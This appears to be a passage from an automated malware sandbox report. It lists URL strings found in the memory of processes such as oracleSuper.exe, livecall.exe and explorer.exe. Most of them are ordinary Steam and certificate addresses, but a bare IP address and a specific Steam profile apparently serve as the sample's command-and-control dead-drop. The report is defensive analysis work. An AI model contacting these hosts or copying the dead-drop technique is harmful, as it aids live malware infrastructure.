Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.symauth.com/cps0(
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.symauth.com/rpa00
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.vmware.com/0
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.vmware.com/0/
Source: 76561199735694209[1].htm.9.dr String found in binary or memory: https://65.21.246.249
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.21.246.249/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d70
Source: 76561199735694209[1].htm.9.dr String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=j2WgmlRVf
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=j2WgmlRVfm
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&l=english&am
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&l=en
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=gi31
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=3W_ge11SZngF&l=englis
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&l=
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=engli
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=iGFW_JMULCcZ&
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=4djfoCdIn7bx&amp
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl
Source: 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=sd6kCnGQW5Ji&
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascr
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=T4lGreKRux_
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&
Source: livecall.exe String found in binary or memory: https://configuration.pcs.v2s.msn-int.com/voiceconfiguration.ashx
Source: livecall.exe String found in binary or memory: https://configuration.pcs.v2s.msn-tst.com/voiceconfiguration.ashx
Source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2170312412.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000002.00000000.2165542384.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000003.00000002.2194751559.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe, 00000003.00000000.2169625734.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe.0.dr, livecall.exe.2.dr String found in binary or memory: https://configuration.pcs.v2s.msn-tst.com/voiceconfiguration.ashxTSThttps://configuration.pcs.v2s.ms
Source: livecall.exe String found in binary or memory: https://configuration.pcs.v2s.msn.com/voiceconfiguration.ashx
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/cps0%
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/rpa0
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://help.steampowered.com/en/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: oracleSuper.exe String found in binary or memory: https://sectigo.com/CPS0
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199735694209[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: explorer.exe, 00000009.00000002.2541375791.0000000003566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/T
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/discussions/
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199735694209[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199735694209
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/market/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: cmd.exe, 00000004.00000002.2407356619.0000000005510000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000009.00000002.2540293467.0000000000445000.00000002.00000001.01000000.00000000.sdmp, explorer.exe, 00000009.00000003.2451026839.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.0000000003585000.00000004.00000020.00020000.00000000.sdmp, fru.4.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199735694209
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199735694209/badges
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199735694209/inventory/
Source: explorer.exe, 00000009.00000002.2541375791.0000000003585000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/765611997356942098
Source: explorer.exe, 00000009.00000003.2450943616.00000000035D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199735694209E
Source: cmd.exe, 00000004.00000002.2407356619.0000000005510000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540293467.0000000000445000.00000002.00000001.01000000.00000000.sdmp, fru.4.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199735694209fr-0Mozilla/5.0
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/workshop/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamloopback.host
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: https://store.st
Source: 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/about/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/explore/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/legal/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/mobile
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/news/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/points/shop/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/privacy_agreement/
